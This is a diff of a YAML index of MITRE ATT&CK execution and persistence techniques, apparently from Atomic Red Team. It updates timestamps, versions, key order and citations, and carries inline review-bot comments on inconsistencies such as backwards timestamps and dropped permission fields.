+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
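Review bot: in the new T1059.011 entry the "Lua Proofpoint Sunseed" description contains a doubled period, "The Proofpoint Threat Research Team.. (2022, March 1)"; drop one. The new entry also carries no `identifier:` key, while the T1559 block immediately above ends with `identifier: T1559`; if the index generator is expected to emit that key for every technique, add `identifier: T1059.011` for consistency. The same hunk removes `x_mitre_permissions_required` from T1559 (Administrator, User, SYSTEM); that matches the upstream field deprecation, but anything downstream that keyed on it should be checked.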
@@ -26110,7 +26489,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
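Review bot: the `modified` timestamp for T1204.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`, which is the opposite direction of every other `modified` change in this patch. Unless the upstream object really reverted its timestamp, this looks like the regeneration pulled a stale copy of that object; verify against the current ATT&CK STIX bundle before merging.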
@@ -26137,30 +26516,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -26177,9 +26538,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26187,21 +26549,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
@@ -26251,28 +26629,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26283,32 +26644,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26351,12 +26724,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26413,11 +26785,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26482,14 +26853,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26510,14 +26880,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
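Review bot: `+ x_mitre_attack_spec_version: 3.2.0` is inserted directly after `kill_chain_phases` for T1648, whereas for the other objects in this patch (T1059.005, T1569.002, T1053.002) the same key sits after `object_marking_refs`, and the later `@@ -26575,29 +26960,10 @@` hunk removes it from that position for T1648 (`- x_mitre_attack_spec_version: 3.2.0`). This is a key move rather than a content change; if the file is emitted in upstream key order that is acceptable, but if key order is meant to be stable per object it is worth normalizing so future diffs stay small. The description change itself (Microsoft 365 Power Automate plus Google Workspace Apps Script) reads consistently with the two new citations it introduces.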
@@ -26526,16 +26901,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
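Review bot: the platform rename `- - Office 365` to `+ - Office Suite` for T1648 changes the platform string that any per-platform grouping keys on; verify that whatever builds platform-specific listings recognizes `Office Suite`, otherwise T1648 silently drops out of the Office/SaaS views. The `x_mitre_version: '1.0'` to `'1.1'` bump and the new `OWN` contributor line are consistent with the description rewrite in the preceding hunk.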
@@ -26561,6 +26938,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
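Review bot: the new `OWN-CERT Google App Script 2024` reference carries a year in its `source_name` but is dated `(n.d.)` in its description, and the `Cloud Hack Tricks GWS Apps Script` entry is likewise `(n.d.)` while pointing at a wiki page that changes over time. If both come verbatim from upstream ATT&CK, leave them as they are; otherwise give the OWN entry its publication date so the `source_name` and the citation agree.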
@@ -26575,29 +26960,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -26610,25 +26976,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
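Review bot: beyond the key reorder, T1204.001 loses `x_mitre_permissions_required: - User` with no replacement field, gains `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false`, and moves from `x_mitre_version: '1.0'` to `'1.1'` with no visible change to `description` or `x_mitre_detection`. Please confirm the dropped permissions field is an intentional upstream removal rather than a casualty of the reordering, and call the field removals out in the PR description, since the `-`/`+` churn here hides them. The same pattern (a dropped `x_mitre_permissions_required`) recurs for T1556.003 later in the patch.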
@@ -26678,17 +27060,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -26751,7 +27132,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -26785,8 +27166,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -26795,6 +27176,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
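Review bot: the new `Malicious Life by Cybereason` URL carries a `#blog-subscribe` fragment (`https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe`), which lands on the subscription widget rather than the article itself; drop the fragment. The entry is also `(n.d.)` despite `Retrieved June 19, 2024`, so if the post is dated, the date belongs in the description like the other dated entries in this list.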
@@ -26807,29 +27192,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
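Review bot: the rewritten T1053.005 description drops the sentence on the deprecated `at` utility (`- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),` `- though at.exe can not access tasks created with schtasks or the Control Panel.`) and replaces it with the `Invoke-CimMethod`/`PS_ScheduledTask` text; confirm the removal is intentional, since T1053.002 in this same patch still presents `at` as the deprecated alternative to `schtasks`. Also `Powershell Cmdlet` should read `PowerShell cmdlet`, matching the `[PowerShell](https://attack.mitre.org/techniques/T1059/001)` spelling used elsewhere in the file. If the text is a verbatim upstream ATT&CK sync, raise both points upstream rather than editing here.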
@@ -26876,7 +27261,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -26908,8 +27293,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -26923,6 +27308,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
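Review bot: the new `Red Canary - Atomic Red Team` reference cites this repository's own `atomics/T1053.005/T1053.005.md` as the source for the `Invoke-CimMethod`/`PS_ScheduledTask` statement in the description, which is circular for a file that lives in the same repository, and the `blob/master/...` URL is unpinned, so the cited page can change underneath the citation. If the entry has to stay (it is upstream ATT&CK content), pinning the URL to a commit would at least make it stable.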
@@ -26935,16 +27324,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
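Review bot: `modified` for T1205.002 moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-10-20T19:56:18.579Z'`, and the same regression appears further down for T1133 (`2023-05-09` to `2023-03-30`), T1546.006 (`2022-05-11` to `2022-04-20`), T1547.014 (`2023-05-09` to `2023-03-22`) and T1542.005 (`2021-04-29` to `2020-10-22`). The old values mostly carry a `14:00:00.188Z` timestamp, which looks like an earlier batch bump, so the new values are plausibly the authoritative upstream ones; still, any consumer that treats `modified` as monotonic will see these objects as older than before, so please note the regression in the PR description.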
@@ -27007,7 +27399,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27072,49 +27463,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
